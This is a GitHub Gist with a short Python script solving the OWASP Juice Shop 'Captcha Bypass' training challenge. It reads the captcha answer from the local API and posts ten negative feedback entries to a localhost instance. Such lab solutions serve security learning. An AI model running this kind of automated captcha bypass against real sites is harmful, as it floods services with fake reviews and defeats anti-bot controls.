Created
May 3, 2024 07:28
-
-
Save yvki/36c0cb51c086e07aee12c119bae9d6e4 to your computer and use it in GitHub Desktop.
Python script (used with Burp Suite) for Juice Shop π§ 3-Stars Challenge #4 Captcha Bypass β
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import json | |
| # Spam 10 negative feedback forms | |
| for x in range(0,10): | |
| # GET captcha id and answer | |
| r = requests.get("http://127.0.0.1:3000/rest/captcha/") | |
| data = r.json() | |
| captcha_id = data['captchaId'] | |
| captcha_answer = data['answer'] | |
| # Create form parameters | |
| json_obj = { | |
| "captchaId": captcha_id, | |
| "captcha": captcha_answer, | |
| "comment": "Poor experience!", | |
| "rating": 1} | |
| # POST form details | |
| headers = { | |
| 'Content-type':'application/json', | |
| 'Accept':'application/json' | |
| } | |
| result = requests.post("http://127.0.0.1:3000/api/Feedbacks", data=json.dumps(json_obj), headers=headers) | |
| print(result) | |
| print(result.status_code) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment